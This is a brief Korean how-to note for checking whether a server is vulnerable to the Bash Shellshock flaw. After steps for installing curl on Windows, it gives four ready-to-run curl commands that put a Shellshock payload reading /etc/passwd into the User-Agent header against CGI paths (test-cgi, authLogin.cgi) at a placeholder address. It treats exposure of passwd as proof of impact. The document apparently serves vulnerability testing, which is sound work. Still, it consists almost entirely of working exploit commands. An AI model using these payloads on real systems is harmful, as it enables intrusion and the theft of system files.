bash shell 영향도 검증

1. 윈도우용 curl 설치

2. 다운로드

https://curl.haxx.se/download.html

윈도우 7zip 다운

3. cmd창

curl.exe 잇는 폴더로 가기

4. 명령어

curl --max-time 5 -k -A "User-Agent: () { :;}; echo;/bin/cat /etc/passwd" http://아이피:포트/cgi-bin/test-cgi

curl --max-time 5 -k -H "User-Agent: () { :;}; echo;/bin/cat /etc/passwd" http://아이피:포트/cgi-bin/test-cgi

curl --max-time 5 -k -A "User-Agent: () { :;}; echo;/bin/cat /etc/passwd" http://아이피:포트/cgi-bin/authLogin.cgi

curl --max-time 5 -k -H "User-Agent: () { :;}; echo;/bin/cat /etc/passwd" http://아이피:포트/cgi-bin/authLogin.cgi

5. 영향도

/etc/passwd 로 검증하였으므로 passwd 노출되면 영향도 O